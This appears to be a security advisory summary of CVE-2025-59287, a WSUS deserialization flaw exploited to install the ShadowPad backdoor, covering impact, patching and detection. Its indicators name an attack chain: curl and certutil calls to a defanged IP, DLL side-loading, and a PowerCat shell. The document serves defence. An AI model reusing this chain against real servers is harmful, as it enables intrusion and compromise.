Full Report
A recently patched security flaw in Microsoft Windows Server Update Services (WSUS) has been exploited by threat actors to distribute malware known as ShadowPad. "The attacker targeted Windows Servers with WSUS enabled, exploiting CVE-2025-59287 for initial access," AhnLab Security Intelligence Center (ASEC) said in a report published last week. "They then used PowerCat, an open-source
Analysis Summary
# Vulnerability: Critical Deserialization Flaw in WSUS Leading to ShadowPad Deployment
## CVE Details
- CVE ID: CVE-2025-59287
- CVSS Score: Not specified in the context, but described as **critical** and allowing RCE with system privileges.
- CWE: Deserialization Flaw (Inferred from description)
## Affected Systems
- Products: Microsoft Windows Server Update Services (WSUS)
- Versions: Unknown (All versions with WSUS enabled that were vulnerable prior to the patch)
- Configurations: Windows Servers with WSUS enabled.
## Vulnerability Description
CVE-2025-59287 is a critical deserialization vulnerability present in Microsoft WSUS. When exploited, it allows an attacker to achieve Remote Code Execution (RCE) with **system privileges** on the affected server. Attackers use this initial access to deploy secondary tools (like PowerCat) and ultimately install the ShadowPad backdoor.
## Exploitation
- Status: **Exploited in the wild** (Used to distribute ShadowPad malware)
- Complexity: Low (Implied by rapid weaponization following PoC release)
- Attack Vector: Network (Targeting publicly exposed WSUS instances)
## Impact
- Confidentiality: High (System access allows sensitive data disclosure)
- Integrity: High (RCE with system privileges allows full system compromise)
- Availability: High (Installation of malware like ShadowPad can lead to system disruption)
## Remediation
### Patches
- Microsoft issued a patch for CVE-2025-59287 "last month" (relative to the article date of Nov 24, 2025). Specific patch version deployment is required.
### Workarounds
- Disable or restrict public exposure of WSUS instances immediately until patching is complete.
## Detection
- Indicators of Compromise (IOCs):
- Execution of utilities like `curl.exe` and `certutil.exe` making external connections (e.g., to `149.28.78[.]189:42306`).
- Presence of ShadowPad components, including the use of DLL side-loading against a legitimate binary like `ETDCtrlHelper.exe` to execute the payload `ETDApix.dll`.
- Discovery of the use of the open-source utility PowerCat attempting to establish a system shell (CMD).
- Detection methods and tools: Monitor network traffic originating from WSUS servers for unexpected external connections and look for anomalous process execution chains involving WSUS services.
## References
- Vendor Advisories: Microsoft Advisory for CVE-2025-59287 (Address patched last month).
- Relevant links - defanged:
- AhnLab Security Intelligence Center Report: asec dot ahnlab dot com/en/91166/
- The Hacker News Article: thehackernews dot com/2025/11/shadowpad-malware-actively-exploits.html